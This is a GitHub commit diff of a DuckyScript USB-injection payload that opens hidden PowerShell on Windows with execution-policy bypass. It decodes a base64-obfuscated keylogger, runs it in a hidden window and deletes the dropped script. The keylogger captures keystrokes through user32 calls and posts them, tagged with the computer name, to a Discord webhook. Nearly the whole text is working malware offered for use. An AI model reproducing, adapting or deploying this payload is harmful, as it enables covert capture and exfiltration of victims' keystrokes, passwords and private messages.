Update Keylogger from base64 to Discord.txt

This commit is contained in:
beigeworm
2023-08-08 23:03:02 +00:00
committed by GitHub
parent b09b547246
commit 0ebea8175b


@@ -1,11 +1,12 @@
REM Title: Keylogger to Discord
REM Title: Keylogger from base64 to Discord
REM Author: @beigeworm
REM Description: Uses Powershell to gather keystroke info and send it via Discord.
REM Target: Windows 10
REM LEARN MORE HERE - https://github.com/beigeworm/Powershell-Tools-and-Toys
REM *SETUP*
REM replace WEBHOOK_GOES_HERE with your discord webhook.
REM set $MsgInterval=1 to desired interval beetween emails (in minutes). Default is 1 minute.
REM some setup for dukie script
DEFAULT_DELAY 100
@@ -14,21 +15,15 @@ REM Open Powershell and start logs.
DELAY 1000
GUI r
DELAY 500
REM Remove '-W Hidden' below to show the powershell setup window.
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
STRING powershell -NoP -NonI -Exec Bypass
ENTER
DELAY 5000
STRING '$MsgInterval = 1;$whuri = "WEBHOOK_GOES_HERE!"' | Out-File -FilePath "$env:temp/a.ps1" -Force
STRING '$dc = "WEBHOOK_GOES_HERE!"' | Out-File -FilePath "$env:temp/a.ps1" -Force
ENTER
STRING $b64 = 'RG97JGFwaXAgPSAxO1N0YXJ0LVNsZWVwIDQ7JHR0cnVuID0gMTskdHN0cnQgPSBHZXQtRGF0ZTskdGVuZCA9ICR0c3RydC5hZGRtaW51dGVzKCRNc2dJbnRlcnZhbCk7IGZ1bmN0aW9uIFN0YXJ0LUxvZ3MoJFBhdGggPSAiJGVudjp0ZW1wXGNoYXJzLnR4dCIpIHskc2lncyA9IEAiDQpbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8sIEV4YWN0U3BlbGxpbmc9dHJ1ZSldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIHNob3J0IEdldEFzeW5jS2V5U3RhdGUoaW50IHZpcnR1YWxLZXlDb2RlKTsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0gcHVibGljIHN0YXRpYyBleHRlcm4gaW50IEdldEtleWJvYXJkU3RhdGUoYnl0ZVtdIGtleXN0YXRlKTsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0gcHVibGljIHN0YXRpYyBleHRlcm4gaW50IE1hcFZpcnR1YWxLZXkodWludCB1Q29kZSwgaW50IHVNYXBUeXBlKTsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0gcHVibGljIHN0YXRpYyBleHRlcm4gaW50IFRvVW5pY29kZSh1aW50IHdWaXJ0S2V5LCB1aW50IHdTY2FuQ29kZSwgYnl0ZVtdIGxwa2V5c3RhdGUsIFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXIgcHdzekJ1ZmYsIGludCBjY2hCdWZmLCB1aW50IHdGbGFncyk7DQoiQDskQVBJID0gQWRkLVR5cGUgLU1lbWJlckRlZmluaXRpb24gJHNpZ3MgLU5hbWUgJ1dpbjMyJyAtTmFtZXNwYWNlIEFQSSAtUGFzc1RocnUgICA7JG51bGwgPSBOZXctSXRlbSAtUGF0aCAkUGF0aCAtSXRlbVR5cGUgRmlsZSAtRm9yY2U7dHJ5e1NsZWVwIDE7JHJ1biA9IDA7d2hpbGUgKCR0dHJ1biAtZ2UgJHJ1bikge3doaWxlICgkdGVuZCAtZ2UgJHRub3cpIHtTbGVlcCAtTWlsbGlzZWNvbmRzIDMwO2ZvciAoJGFzY2lpID0gOTsgJGFzY2lpIC1sZSAyNTQ7ICRhc2NpaSsrKSB7DQokc3RhdGUgPSAkQVBJOjpHZXRBc3luY0tleVN0YXRlKCRhc2NpaSk7IGlmICgkc3RhdGUgLWVxIC0zMjc2Nyl7JG51bGwgPSBbY29uc29sZV06OkNhcHNMb2NrOyR2aXJ0dWFsS2V5ID0gJEFQSTo6TWFwVmlydHVhbEtleSgkYXNjaWksIDMpOyRrYnN0YXRlID0gTmV3LU9iamVjdCBCeXRlW10gMjU2DQokY2hlY2trYnN0YXRlID0gJEFQSTo6R2V0S2V5Ym9hcmRTdGF0ZSgka2JzdGF0ZSk7JG15Y2hhciA9IE5ldy1PYmplY3QgLVR5cGVOYW1lIFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXI7JHN1Y2Nlc3MgPSAkQVBJOjpUb1VuaWNvZGUoJGFzY2lpLCAkdmlydHVhbEtleSwgJGtic3RhdGUsICRteWNoYXIsICRteWNoYXIuQ2FwYWNpdHksIDApDQppZiAoJHN1Y2Nlc3MpIHtbU3lzdGVtLklPLkZpbGVdOjpBcHBlbmRBbGxUZXh0KCRQYXRoLCAkbXljaGFyLCBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVbmljb2RlKX19fSR0bm93ID0gR2V0LURhdGV9OyRtc2cgPSBHZXQtQ29udGVud
CAtUGF0aCAkUGF0aCAtUmF3DQokZXNjbXNnID0gJG1zZyAtcmVwbGFjZSAnWyY8Pl0nLCB7JGFyZ3NbMF0uVmFsdWUuUmVwbGFjZSgnJicsICcmYW1wOycpLlJlcGxhY2UoJzwnLCAnJmx0OycpLlJlcGxhY2UoJz4nLCAnJmd0OycpfTskanNvbiA9IEB7InVzZXJuYW1lIiA9ICIkZW52OkNPTVBVVEVSTkFNRSIgOyAiY29udGVudCIgPSAkZXNjbXNnfSB8IENvbnZlcnRUby1Kc29uDQpTbGVlcCAxO0ludm9rZS1SZXN0TWV0aG9kIC1VcmkgJHdodXJpIC1NZXRob2QgUG9zdCAtQ29udGVudFR5cGUgImFwcGxpY2F0aW9uL2pzb24iIC1Cb2R5ICRqc29uO1NsZWVwIDE7UmVtb3ZlLUl0ZW0gLVBhdGggJFBhdGggLWZvcmNlfX1maW5hbGx5e319U3RhcnQtTG9nc31XaGlsZSAoJGFwaXAgLWxlIDUp'
STRING $b64 = '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'
ENTER
STRING $decodedFile = [System.Convert]::FromBase64String($b64);$decodedText = [System.Text.Encoding]::UTF8.GetString($decodedFile);$decodedText | Out-File -FilePath "$env:temp/a.ps1" -Append
ENTER
STRING Start-Process PowerShell.exe -ArgumentList ("-NoP -Ep Bypass -w h -File `"$env:temp/a.ps1`"" -f $PSCommandPath);sleep 7;Remove-Item -Path $File -Force
STRING Start-Process PowerShell.exe -ArgumentList ("-NoP -Ep Bypass -w h -File `"$env:temp/a.ps1`"" -f $PSCommandPath);sleep 7;Remove-Item -Path $File -Force;exit
ENTER
STRING
ENTER